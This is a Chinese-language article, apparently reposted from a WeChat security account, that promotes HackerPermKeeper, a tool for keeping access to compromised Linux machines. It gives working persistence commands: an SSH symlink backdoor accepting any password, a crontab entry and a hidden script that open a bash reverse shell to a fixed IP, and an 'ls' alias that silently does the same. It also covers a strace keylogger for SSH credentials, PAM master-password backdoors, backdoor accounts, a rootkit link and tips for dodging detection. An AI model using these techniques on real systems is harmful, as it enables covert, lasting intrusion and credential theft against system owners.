工具介绍 通过渗透拿到权限之后,为了不让权限丢失,都会进行权限维持,而在进行权限维持的时候,红队需要花费大量的时候,来验证是否合适,因此在这款工具就诞生 HackerPermKeeper
python3
运行此项目
[我自己的环境是Python 3.9.7]
,但是运行权限维持模块脚本请看上面的表格
安装依赖
pip
install
-r
requirements
.txt
/check/ 目录下的check.py文件[这个不需要任何依赖环境,python3和python2都支持]
python
check.py
python3
check.py
python2
check.py
查看权限维持模块信息
python
main
.py
-c
1
查看权限维持模详细块信息
python
main
.py
-c
2
使用此项目生成权限维持脚本
[在这之前,请先运行check.py脚本判断出目标机器适合什么类型权限维持的脚本]
python
main
.py
-m
1 #选择模块
有的生成的脚本文件。需要在生成之后进行手动修改
比如:修改反弹
shellip
以及端口,后门用户密码,
ssh
密钥密码,
ssh
密钥等
[此缺陷将会在第二个版本修复]
生成的文件会在
payloads
目录下产生
OpenSSH后门万能密码&记录密码(这个需要依赖环境),就是把对方的门换个锁,但是原来的钥匙也可以使用
发现程度:
||
PAM后门,PAM是一个Linux登录验证的认证服务,修改其中关于ssh登录的验证,添加一个万能密码,已经记录的账号密码位置(类似把对方房间内有内鬼)
发现程度:
||
SSH软链接
cat /etc/ssh/sshd_config
|grep UsePAM
ln -sf /usr/sbin/sshd /tmp/su;/tmp/su -oPort=8888
ssh root@xx.xx.xx.xx -p 8888 任意密码登录即可
发现程度:|
||
||
|
公私钥
使用密钥进行登录
发现程度:|
||
||
|
后门帐号
使用命令添加账号
发现程度:|
||
||
|
crontab后计划任务
1、编辑后门反弹
vim /etc/.111.sh
#!/bin/bash
sh -i >& /dev/tcp/192.168.86.137/3434 0>&1
chmod +x /etc/.111.sh
2、添加定时任务
vim /etc/crontab
*/1 * * * * root /etc/.1111.sh
发现程度:|
||
||
|
Strace后门
strace是一个动态跟踪工具,它可以跟踪系统调用的执行。
我们可以把他当成一个键盘记录的后门,来扩大我们的信息收集范围
可以记录ssh明文和密钥(登录的)和Rootkit配合一起
发现程度:|
||
|
命令自定义-Alias后门
alias
命令的功能:为命令设置别名
alias
ls='alerts(){ ls $* --color=auto;bash -i >& /dev/tcp/192.168.86.137/3333 0>&1; };alerts'
执行ls就会反弹shell
持久化+隐藏:重启依旧生效
发现程度:|
||
|
Rootkit后门
https://github.com/f0rb1dd3n/Reptile/releases/
Rootkit是一种特殊的恶意软件,它的功能是在安装目标上隐藏自身及指定的文件、进程和网络链接等信息,比较多见到的是Rootkit一般都和木马、后门等其他恶意程序结合使用。
发现程度:|
|
但是使用工具进行检测出来情况很大,建议看代码,手动编写此工具(难度很大)
history不记录执行命令
在输入命令时候,添加空格
ssh软链接&crontab
快速生成软链接[需要运行脚本成功后,一分钟连接],并且执行计划任务,每分钟判断当前软链接是否存在,如果被kill掉,就重新执行
|
||
||
越多,越容易发发现
||
越少,越难发现,但是部署起来,需要的依赖很多
1
、
使用ssh密钥后门连接的时候,出现这个错误,就是当前ip有在known_hosts中存在多个主机文件
解决:ssh-keygen -f
"known_hosts文件"
-R
"目标Ip"
或者使用另外一台机器连接
2、
下载的ssh密钥连接的时候出现安全性错误

解决:修改权限 chmod 600 密钥文件,然后在连接
原文始发于微信公众号(夜组安全):Linux权限维持工具
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论